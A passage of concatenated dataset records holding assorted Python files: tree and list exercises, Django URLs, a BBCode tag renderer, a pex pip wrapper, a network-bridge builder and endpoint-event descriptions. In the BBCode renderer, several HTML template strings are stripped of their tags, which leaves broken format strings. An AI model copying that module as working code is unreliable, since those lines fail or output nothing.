None\n\n for cmd in cmd_list:\n cmd = cmd.split()\n\n if cmd[0] == \"BuildTree\":\n if t is not None:\n print(\"Already built tree! Ignoring this command\")\n continue\n print(\"Building tree\")\n t = Tree(float(cmd[1]))\n t.insert(int(cmd[2]))\n elif cmd[0] == \"Insert\":\n print(\"Inserting\", cmd[1])\n t.insert(int(cmd[1]))\n elif cmd[0] == \"Delete\":\n print(\"Deleting\", cmd[1])\n t.delete(int(cmd[1]))\n elif cmd[0] == \"Search\":\n print(\"Searching for\", cmd[1])\n val = t.search(int(cmd[1]))\n if val == True:\n print(\"Found\", cmd[1])\n else:\n print(cmd[1], \"is not in the tree\")\n elif cmd[0] == \"Print\":\n print(\"Printing tree\")\n print_tree(t.root, 1)\n elif cmd[0] == \"Done\":\n print(\"Exiting program\")\n sys.exit(0)\n else:\n print(cmd[0])\n print(\"Unrecognized command, exiting program\")\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"scapegoat.py","file_name":"scapegoat.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"240821460","text":"class Solution:\n def divide(self, dividend: int, divisor: int) -> int:\n if dividend == 2**31 and divisor == -1:\n return 2**31\n ans = 0\n sign = -1 if (dividend > 0) ^ (divisor > 0) else 1 # True ^ False = True, True ^ True = False, False ^ False = True,\n dividend, divisor = abs(dividend), abs(divisor)\n while dividend >= divisor:\n subtracted = divisor\n times = 1 # subtract表示整除的数,times表示整除的次数\n while subtracted << 1 <= dividend: # 当subtracted乘以2后任然小于 dividend,进行下面2步操作\n subtracted <<= 1 # 左移一位乘以2\n times <<= 1\n ans += times\n dividend -= subtracted\n return ans * sign\n\nprint(Solution().divide(7,-3))","sub_path":"数学/29.两数相除.py","file_name":"29.两数相除.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336110947","text":"lista = []\npares = []\nimpares = []\nwhile True:\n lista.append(int(input('Digite um valor: ')))\n c = str(input('Deseja continuar? [S/N] ')).strip()\n if c in 'Nn':\n break\n\nfor v in lista:\n if v % 2 == 0:\n pares.append(v)\n else:\n impares.append(v)\n\nprint(f'\\nA lista completa e {lista}')\nprint(f'A lista de pares e {pares}')\nprint(f'A lista de impares e {impares}')","sub_path":"CursoemVideo/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578774613","text":"from django.conf.urls import url, include\r\nfrom django.contrib import admin\r\nfrom products import views\r\n\r\nurlpatterns = [\r\n url(r'^product/(?P\\w+)/$', views.product, name='product'),\r\n url(r'^new_items/$', views.new_items, name='new_items'),\r\n url(r'^discounts/$', views.discounts, name='discounts'),\r\n url(r'^products_men/$', views.products_men, name='products_men'),\r\n url(r'^products_women/$', views.products_women, name='products_women'),\r\n url(r'^products_children/$', views.products_children, name='products_children'),\r\n]\r\n","sub_path":"mysite/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"292629850","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom flask import current_app as app\nfrom pkg_resources import parse_version as V\nfrom werkzeug import escape, unescape, url_quote, html as html_builder\nfrom .core import register_node, register_hook, BaseNode, \\\n PlainNode, RegexNode, NodeError\n\nURL_QUOTE_SAFE = b'/:;\"%&#()=?'\n\n\nclass _ListNode(BaseNode):\n display = 'block'\n list_builder = None\n\n def html(self, **kwargs):\n children = []\n innerhtml = ''\n\n def append_li(html):\n html = html.strip()\n if html:\n children.append(html_builder.li(html))\n return ''\n\n for node in self.children:\n if not node:\n continue\n if isinstance(node, PlainNode):\n innerhtml += node.html(**dict(kwargs, br=False)) # 此处不出现br\n if node.has_linebreak:\n # 发现有换行符的纯文本, li 结束\n innerhtml = append_li(innerhtml)\n else:\n innerhtml += node.html(**kwargs)\n if node.display == 'block':\n # 发现块级元素, li 结束\n innerhtml = append_li(innerhtml)\n\n # 处理循环中没有处理的残留 innerhtml\n append_li(innerhtml)\n # html_builder 返回的函数只能用一次\n return getattr(html_builder, self.html_tagname)(*children)\n\n\n@register_node('ul')\nclass UlNode(_ListNode):\n name = 'ul'\n html_tagname = 'ul'\n\n\n@register_node('ol')\nclass OlNode(_ListNode):\n name = 'ol'\n html_tagname = 'ol'\n\n\n@register_node('url')\nclass URLNode(BaseNode):\n name = 'url'\n tag_excludes = ['url', '__at__', '__email__', '__url__']\n\n def __init__(self, value, children):\n if not value and not children:\n raise NodeError('URL must contains either value or children')\n if not children:\n children = [PlainNode(value)]\n super(URLNode, self).__init__(value, children)\n url = self.value if self.value else self.children_unicode()\n if url.lower()[:11] == 'javascript:':\n url = ''\n self.url = url\n\n def html(self, **kwargs):\n inside = self.children_html(**kwargs)\n return '%s' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n inside)\n\n\n@register_node('image', 'img')\nclass ImageNode(BaseNode):\n name = 'image'\n tag_includes = []\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Image URL can only be specified from children')\n super(ImageNode, self).__init__(value, children)\n url = self.children_unicode()\n if url.lower()[:11] == 'javascript:' or \\\n url.lower()[:9] == 'vbscript:':\n url = ''\n self.url = url\n\n def text(self):\n return ''\n\n def html(self, **kwargs):\n from guokr.platform.flask.helpers import resp_image\n from guokr.platform.flask.helpers import get_params, url2hashkey\n width = kwargs.get('resp_width', 480)\n url = resp_image(self.url, width)\n hashkey = url2hashkey(self.url, take_thumbnail=True)\n if not hashkey:\n return '' % (\n escape(url_quote(url, safe=URL_QUOTE_SAFE), quote=True), width)\n\n w, h, file_type = get_params(hashkey)\n return ('') % (\n escape(url_quote(url, safe=URL_QUOTE_SAFE), quote=True),\n width,\n w,\n h,\n hashkey)\n\n\n@register_node('bold', 'b')\nclass BoldNode(BaseNode):\n name = 'bold'\n tag_excludes = ['bold', 'b']\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n else:\n return '%s' % self.children_html(**kwargs)\n\n\n@register_node('italic', 'i')\nclass ItalicNode(BaseNode):\n name = 'italic'\n tag_excludes = ['italic', 'i']\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n else:\n return '%s' % self.children_html(**kwargs)\n\n\n@register_node('color')\nclass ColorNode(BaseNode):\n name = 'color'\n tag_excludes = ['color']\n html_colors = re.compile('^([A-Za-z]+|#[0-9A-Fa-f]{,6})$')\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n if self.value: # 添加这个,判断无参数的情况\n color = self.value.strip()\n else:\n color = '#000000' # 默认为白\n if not self.html_colors.match(color):\n style = ''\n else:\n style = 'color: ' + color + ';'\n # 偷懒, 没有支持不带 # 的 16 进制写法\n return '%s' % (\n style, self.children_html(**kwargs))\n\n\n@register_node('quote', 'blockquote')\nclass QuoteNode(BaseNode):\n name = 'quote'\n display = 'block'\n tag_excludes = ['quote', 'blockquote']\n\n def html(self, **kwargs):\n return '
%s
' % self.children_html(**kwargs)\n\n\n@register_node('code')\nclass CodeNode(BaseNode):\n name = 'code'\n tag_excludes = ['code']\n\n def html(self, **kwargs):\n return '
%s
' % self.children_html(**dict(kwargs, br=False))\n\n\n@register_node('table', 'th', 'tr')\nclass TableNode(BaseNode):\n name = 'table'\n display = 'block'\n\n def html(self, **kwargs):\n innerhtml = []\n for child in self.children:\n if isinstance(child, PlainNode):\n innerhtml.append(child.html(**dict(kwargs, br=False)))\n else:\n innerhtml.append(child.html(**kwargs))\n return getattr(html_builder, self.name)(*innerhtml)\n\n\n@register_node('_html', 'td', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6')\nclass HTMLNode(BaseNode):\n name = 'td'\n display = 'block'\n\n def html(self, **kwargs):\n return getattr(html_builder, self.name)(self.children_html(**kwargs))\n\n\n@register_node('ref')\nclass RefNode(BaseNode):\n name = 'ref'\n tag_includes = []\n\n url_whitelist = re.compile(\n r'^(?:http://(?:(?:www)?\\.guokr\\.com|guo\\.kr))?'\n r'(?P/(?:article|blog|question|answer|post)/\\d+|'\n r'/question/\\d+/answer/\\d+)/?(?:\\?|$)')\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Ref URL can only be specified from children')\n super(RefNode, self).__init__(value, children)\n url = self.children_unicode().strip()\n m = self.url_whitelist.search(url)\n if m:\n self.url = url.rstrip('/') + '/'\n else:\n raise NodeError('Invalid ref URL')\n\n def html(self, **kwargs):\n return html_builder.a(self.url, href=self.url, class_='bbcode-ref')\n\n\n@register_node('flash')\nclass FlashNode(BaseNode):\n name = 'flash'\n tag_includes = []\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Ref URL can only be specified from children')\n super(FlashNode, self).__init__(value, children)\n url = self.children_unicode().strip()\n if url.lower()[:11] == 'javascript:':\n url = ''\n self.url = url\n\n def html(self, **kwargs):\n width = kwargs.get('resp_width', 480)\n height = width * 5 / 6\n # TODO: use placeholder\n return \\\n '' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n width, height)\n\n\n@register_node('__url__', weight=100)\nclass RegexURLNode(RegexNode):\n name = '__url__'\n regex = re.compile(r\"\"\"(?iux)\n (?:https?|ftps?|ssh|sftp|ed2k|git|svn|svn\\+ssh|smb)\n ://[\\w\\?\\.=&+%/#;@:~!,()-]+\"\"\")\n\n @property\n def url(self):\n return self.value.group(0)\n\n def html(self, **kwargs):\n return '%s' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n escape(self.url))\n\n\n@register_node('__at__', weight=30)\nclass AtNode(RegexNode):\n name = '__at__'\n regex = re.compile(r\"\"\"(?ux)(?\n [\\w\\u3400-\\u4db5\\u4e00-\\u9fcb\\.-]{1,20}\n )\"\"\")\n\n @property\n def nickname(self):\n return self.value.group('nickname')\n\n def html(self, **kwargs):\n from flask import url_for\n nickname = self.value.group('nickname')\n if app:\n return '@%s' % (\n url_for(\n 'community:profile.nickname_redirect', nickname=nickname),\n escape(nickname))\n else:\n return '@%s' % escape(nickname)\n\n\n@register_node('__email__', weight=80)\nclass EmailNode(RegexNode):\n name = '__email__'\n regex = re.compile(r'(?i)[\\w+\\.-]+@[\\w][\\w\\.-]*\\.[a-z]{2,10}')\n\n @property\n def email(self):\n return self.value.group(0)\n\n def html(self, **kwargs):\n return '%s' % (\n escape(self.email, quote=True),\n escape(self.email))\n\n\n@register_node('math')\nclass MathMode(BaseNode):\n name = 'math'\n tag_includes = []\n\n @property\n def math(self):\n ret = ''\n for node in self.children:\n if node:\n ret += node.html(br=False)\n return unescape(ret)\n\n @property\n def hashed(self):\n import hashlib\n return hashlib.sha1(self.math).hexdigest()\n\n @property\n def format(self):\n from flask import request\n browser = request.user_agent.browser\n version = V(request.user_agent.version or '')\n # version = float('.'.join(version.split('.', 2)[:2])) if version else\n # None\n if not browser or not version:\n return 'png'\n if (\n (browser == 'msie' and version >= V('9')) or # trident >= 5.0\n (browser == 'firefox' and version >= V('4')) or # gecko >= 2.0\n (browser == 'webkit' and version >= V('522')) or # webkit >= 522\n browser == 'chrome' or browser == 'konqueror' or # all versions\n (browser == 'safari' and version >= V('3.0')) or # webkit >= 522\n (browser == 'opera' and version > V('9.5'))): # presto >= 2.1\n return 'svg'\n else:\n return 'png'\n\n def html(self, **kwargs):\n from flask import url_for\n width = kwargs.get('resp_width', 480)\n\n return ('') % (\n url_for(\n 'image:formula',\n hashed=self.hashed,\n format=self.format),\n escape(self.math, quote=True), width)\n\n def text(self):\n return ''\n\n\n@register_node('indent')\nclass IndentNode(BaseNode):\n\n \"\"\"缩进标签的显示\"\"\"\n name = 'indent'\n display = 'block'\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n return html_builder.div(self.children_html(**dict(kwargs, br=False)),\n class_=\"bbcode-indent\")\n\n\n@register_node('float')\nclass FloatNode(BaseNode):\n\n \"\"\"浮动标签的支持\"\"\"\n name = 'float'\n display = 'block'\n tag_excludes = ['float']\n html_float = re.compile('^left|right$')\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n if self.value: # 判断是否有参数,不判断会有AttributeError生成\n direction = self.value.strip()\n else:\n direction = 'left' # 默认左浮\n if not self.html_float.match(direction):\n style = ''\n else:\n style = 'bbcode-float-' + direction\n return html_builder.div(self.children_html(**dict(kwargs, br=False)),\n class_=style)\n\n\n@register_hook('after_parse')\ndef math_hook(bbcode):\n from guokr.platform.apis import APIServerError, APIClientError\n from guokr.platform.apis.confidential import formula\n from guokr.platform.engines import _share_redis\n math_map = {}\n for node in bbcode.filter('math'):\n math_map[node.hashed] = node.math\n if not math_map:\n return\n hashed = math_map.keys()\n # 通过redis检查公式是否已经生成过\n result = _share_redis.hmget('image-formula', hashed)\n math_exist = zip(hashed, result)\n for hashed, is_exist in math_exist:\n if is_exist is None:\n # 同步创建, 确保正常显示\n # 生成公式是重操作, 所以单独请求避免造成过大负载\n try:\n formula.create(tex=math_map[hashed], confirm=True)\n except (APIServerError, APIClientError):\n pass\n","sub_path":"frame/platform_src/contribs/bbcode/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":13490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"223864644","text":"\"\"\"\nProgram Name: Programming Problems Q13\nProgrammer: Hyun Wook Kim\nDate: 2018.06.30\nDescription:\n문자의 자리수와 숫자의 자리수를 세는 프로그램을\n작성하시오.\n\"\"\"\n\nif __name__ == '__main__':\n ip = input()\n l_count = 0\n d_count = 0\n\n for i in range(ip.__len__()):\n if ip.__getitem__(i).isalpha():\n l_count += 1\n elif ip.__getitem__(i).isdigit():\n d_count += 1\n\n print(\"LETTERS %s\\nDIGITS %s\" % (l_count, d_count))\n","sub_path":"Taco101_Python/ProgrammingProblems/Q13.py","file_name":"Q13.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"478843220","text":"# coding=utf-8\n# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nfrom collections import deque\n\nfrom pex import third_party\nfrom pex.interpreter import PythonInterpreter\nfrom pex.platforms import Platform\nfrom pex.variables import ENV\n\n\nclass PipError(Exception):\n \"\"\"Indicates an error running a pip command.\"\"\"\n\n\ndef execute_pip_isolated(args, cache=None, interpreter=None):\n env = os.environ.copy()\n env['__PEX_UNVENDORED__'] = '1'\n\n pythonpath = third_party.expose(['pip', 'setuptools', 'wheel'])\n\n pip_args = ['-m', 'pip', '--disable-pip-version-check', '--isolated']\n\n # The max pip verbosity is -vvv and for pex it's -vvvvvvvvv; so we scale down by a factor of 3.\n verbosity = ENV.PEX_VERBOSE // 3\n if verbosity > 0:\n pip_args.append('-{}'.format('v' * verbosity))\n else:\n pip_args.append('-q')\n\n if cache:\n pip_args.extend(['--cache-dir', cache])\n else:\n pip_args.append('--no-cache-dir')\n\n pip_cmd = pip_args + args\n\n interpreter = interpreter or PythonInterpreter.get()\n cmd, process = interpreter.open_process(args=pip_cmd, pythonpath=pythonpath, env=env)\n if process.wait() != 0:\n raise PipError('Executing {} failed with {}'.format(' '.join(cmd), process.returncode))\n\n\ndef _calculate_package_index_options(indexes=None, find_links=None):\n # N.B.: We interpret None to mean accept pip index defaults, [] to mean turn off all index use.\n if indexes is not None:\n if len(indexes) == 0:\n yield '--no-index'\n else:\n all_indexes = deque(indexes)\n yield '--index-url'\n yield all_indexes.popleft()\n if all_indexes:\n for extra_index in all_indexes:\n yield '--extra-index-url'\n yield extra_index\n\n if find_links:\n for find_link_url in find_links:\n yield '--find-links'\n yield find_link_url\n\n\ndef download_distributions(target,\n requirements=None,\n requirement_files=None,\n constraint_files=None,\n allow_prereleases=False,\n transitive=True,\n interpreter=None,\n platform=None,\n indexes=None,\n find_links=None,\n cache=None,\n build=True,\n use_wheel=True):\n\n download_cmd = ['download', '--dest', target]\n download_cmd.extend(_calculate_package_index_options(indexes=indexes, find_links=find_links))\n\n if platform:\n # TODO(John Sirois): Consider moving this parsing up to the CLI and switching the API to take\n # an (extended) `Platform` object instead of a string.\n platform_info = Platform.create(platform)\n if not platform_info.is_extended:\n raise PipError('Can only download distributions for fully specified platforms, given {!r}.'\n .format(platform))\n\n foreign_platform = platform_info != Platform.of_interpreter(interpreter)\n if foreign_platform:\n # We're either resolving for a different host / platform or a different interpreter for the\n # current platform that we have no access to; so we need to let pip know and not otherwise\n # pickup platform info from the interpreter we execute pip with.\n download_cmd.extend(['--platform', platform_info.platform])\n download_cmd.extend(['--implementation', platform_info.impl])\n download_cmd.extend(['--python-version', platform_info.version])\n download_cmd.extend(['--abi', platform_info.abi])\n else:\n foreign_platform = False\n\n if not use_wheel:\n if not build:\n raise PipError('Cannot both ignore wheels (use_wheel=False) and refrain from building '\n 'distributions (build=False).')\n elif foreign_platform:\n raise PipError('Cannot ignore wheels (use_wheel=False) when resolving for a foreign '\n 'platform: {}'.format(platform))\n\n if foreign_platform or not build:\n download_cmd.extend(['--only-binary', ':all:'])\n\n if not use_wheel:\n download_cmd.extend(['--no-binary', ':all:'])\n\n if allow_prereleases:\n download_cmd.append('--pre')\n\n if not transitive:\n download_cmd.append('--no-deps')\n\n if requirement_files:\n for requirement_file in requirement_files:\n download_cmd.extend(['--requirement', requirement_file])\n\n if constraint_files:\n for constraint_file in constraint_files:\n download_cmd.extend(['--constraint', constraint_file])\n\n download_cmd.extend(requirements)\n\n execute_pip_isolated(download_cmd, cache=cache, interpreter=interpreter)\n\n\ndef build_wheels(distributions,\n target,\n interpreter=None,\n indexes=None,\n find_links=None,\n cache=None):\n wheel_cmd = ['wheel', '--no-deps', '--wheel-dir', target]\n\n # If the build is PEP-517 compliant it may need to resolve build requirements.\n wheel_cmd.extend(_calculate_package_index_options(indexes=indexes, find_links=find_links))\n\n wheel_cmd.extend(distributions)\n execute_pip_isolated(wheel_cmd, cache=cache, interpreter=interpreter)\n\n\ndef install_wheel(wheel, target, compile=False, overwrite=False, cache=None, interpreter=None):\n install_cmd = ['install', '--no-deps', '--no-index', '--only-binary', ':all:', '--target', target]\n install_cmd.append('--compile' if compile else '--no-compile')\n if overwrite:\n install_cmd.extend(['--upgrade', '--force-reinstall'])\n install_cmd.append(wheel)\n execute_pip_isolated(install_cmd, cache=cache, interpreter=interpreter)\n","sub_path":"pex/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96963437","text":"# @Time : 2019/5/14 7:12\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List, Tuple, Optional\nimport heapq\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n ret = ListNode(0)\n\n def argmin(lists: List[ListNode]) -> Tuple[int, int]:\n idx = 0\n min_ = float('inf')\n for i in range(len(lists)):\n if lists[i] and lists[i].val < min_:\n min_ = lists[i].val\n idx = i\n return idx, min_\n\n node = ret\n while any(lists):\n idx, min_val = argmin(lists)\n node.next = ListNode(min_val)\n node = node.next\n lists[idx] = lists[idx].next\n return ret.next\n\n # 小顶堆,原地\n def mergeKLists1(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n ret = ListNode(0)\n heap = []\n # 建堆\n for i, lst in enumerate(lists):\n if lst: heapq.heappush(heap, (lst.val, i, lst))\n node = ret\n while heap:\n min_val, i, n = heapq.heappop(heap)\n node.next = n\n node = node.next\n if n.next:\n heapq.heappush(heap, (n.next.val, i, n.next))\n n.next = None\n return ret.next\n\n # 小顶堆\n def mergeKLists2(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n ret = ListNode(0)\n heap = []\n # 建堆\n for i, lst in enumerate(lists):\n val = lst.val if lst else float('inf')\n heapq.heappush(heap, (val, i))\n if lists[i]: lists[i] = lists[i].next\n node = ret\n while True:\n min_val, idx = heapq.heappop()\n if min_val == float('inf'): break\n node.next = ListNode(min_val)\n node = node.next\n new_val = lists[idx].val if lists[idx] else float('inf')\n heapq.heappush(heap, (new_val, idx))\n if lists[idx]: lists[idx] = lists[idx].next\n return ret.next\n\n # 分治\n def mergeKLists3(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1 and n2: return n2\n if not n2 and n1: return n1\n ret = ListNode(0)\n node = ret\n while n1 and n2:\n if n1.val < n2.val:\n node.next = ListNode(n1.val)\n n1 = n1.next\n else:\n node.next = ListNode(n2.val)\n n2 = n2.next\n node = node.next\n if n1: node.next = n1\n if n2: node.next = n2\n return ret.next\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n\n # 分治,原地\n def mergeKLists4(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1 and n2: return n2\n if not n2 and n1: return n1\n ret = ListNode(0)\n node = ret\n while n1 and n2:\n if n1.val < n2.val:\n node.next = n1\n n1 = n1.next\n else:\n node.next = n2\n n2 = n2.next\n node = node.next\n if n1: node.next = n1\n if n2: node.next = n2\n return ret.next\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n\n # 分治,原地\n def mergeKLists5(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1: return n2\n if not n2: return n1\n if n1.val < n2.val:\n n1.next = merge(n1.next, n2)\n return n1\n else:\n n2.next = merge(n1, n2.next)\n return n2\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n","sub_path":"mergeKLists.py","file_name":"mergeKLists.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"559697002","text":"from .topology import TopologyMember\nfrom .netdev import NetDev\n\n\nclass Bridge(TopologyMember):\n REF = 'bridge'\n DESC = {'title': 'Bridge Interface'}\n SCHEMA = {\n 'type': 'object',\n 'additionalProperties': False,\n 'required': ['name', 'netns'],\n 'properties': {\n 'name': {'type': 'string'},\n 'ports': {'type': 'array', 'items': {'type': 'string'}},\n **NetDev.DEV_PROPS\n }\n }\n\n def __init__(self, topology, name, ns, ports, dev_args=None):\n super().__init__(topology, name)\n dev_args = dev_args or {}\n self.dev = NetDev(topology=topology, name=name, owner=self, ns=ns,\n ports=ports, **dev_args)\n key = '%s.%s' % (self.REF, self.name)\n self.topology.members['%s.dev' % key] = self.dev\n for p in self.dev.ports:\n p.master = self\n self.topology.add_l2_conn(self.dev, p)\n self.topology.add_prereq(self, p)\n\n @classmethod\n def from_params(cls, topology, params):\n port_names = params.get('ports') or []\n ports = [topology.members[p] for p in port_names]\n dev_args = NetDev.args_from_params(topology, params)\n ns = topology.members[params['netns']]\n return cls(topology, params['name'], ns, ports, dev_args)\n\n def render_dot(self):\n for p in self.dev.ports:\n self.p('%s -- %s [color=\"blue\"]' % (self.dev.dotname,\n p.dotname))\n\n def render_bash(self):\n self.p('ip -net %s link add %s type %s ' % (self.dev.ns.name,\n self.dev.name,\n self.REF))\n self.dev.render_bash()\n\n for p in self.dev.ports:\n self.p('ip -net %s link set %s master %s' % (self.dev.ns.name,\n p.name,\n self.dev.name))\n","sub_path":"netpen/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39386573","text":"# Copyright 2015 refractionPOINT\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom beach.actor import Actor\nimport re\nimport ipaddress\nimport traceback\nimport base64\nimport json\nimport uuid\n_x_ = Actor.importLib( './hcp_helpers', '_x_' )\n_xm_ = Actor.importLib( './hcp_helpers', '_xm_' )\nexeFromPath = Actor.importLib( './hcp_helpers', 'exeFromPath' )\nnormalAtom = Actor.importLib( './hcp_helpers', 'normalAtom' )\nObjectTypes = Actor.importLib( './ObjectsDb', 'ObjectTypes' )\n\n# The event tuples are: ( eventTypeDescription, funcForKey, funcForShortKey, funcForNarrative )\n\n_eventTypes = {\n 'notification.NEW_PROCESS' : ( 'new process starting',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s with pid %s is starting.' % ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.PROCESS_NAME ) ),\n 'notification.EXISTING_PROCESS' : ( 'pre-existing process',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s with pid %s is already running.' % ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.PROCESS_NAME ) ),\n 'notification.TERMINATE_PROCESS' : ( 'a process is terminating',\n lambda x: _x_( x, '?/base.PROCESS_ID' ),\n lambda x: _x_( x, '?/base.PROCESS_ID' ),\n lambda x: 'The process with pid %s is terminating.' % ( _x_( x, '?/base.PROCESS_ID' ), ),\n lambda x: ( None, None ) ),\n 'notification.CODE_IDENTITY' : ( 'new unique code executed',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The code on disk at %s was executed for the first time.' % ( _x_( x, '?/base.FILE_PATH' ), ),\n lambda x: ( _x_( x, '?/base.HASH' ), ObjectTypes.FILE_HASH ) ),\n 'notification.DNS_REQUEST' : ( 'new domain name request',\n lambda x: _x_( x, '?/base.DOMAIN_NAME' ),\n lambda x: _x_( x, '?/base.DOMAIN_NAME' ),\n lambda x: 'A request for the domain name %s.' % ( _x_( x, '?/base.DOMAIN_NAME' ), ),\n lambda x: ( _x_( x, '?/base.DOMAIN_NAME' ), ObjectTypes.DOMAIN_NAME ) ),\n 'notification.MODULE_LOAD' : ( 'a module is being loaded',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The code on disk at %s was loaded into %s.' % ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.MODULE_NAME ) ),\n 'notification.FILE_CREATE' : ( 'a file is created',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s created the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_DELETE' : ( 'a file is deleted',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s deleted the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_MODIFIED' : ( 'a file is modified',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s modified the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n 'notification.FILE_READ' : ( 'a file is read',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s read the file %s.' % ( _x_( x, '?/base.PROCESS_ID' ),\n _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: ( None, None ) ),\n}\n\ndef _sanitizeJson( o, summarized = False ):\n if type( o ) is dict:\n for k, v in o.iteritems():\n o[ k ] = _sanitizeJson( v, summarized = summarized )\n elif type( o ) is list or type( o ) is tuple:\n o = [ _sanitizeJson( x, summarized = summarized ) for x in o ]\n elif type( o ) is uuid.UUID:\n o = str( o )\n 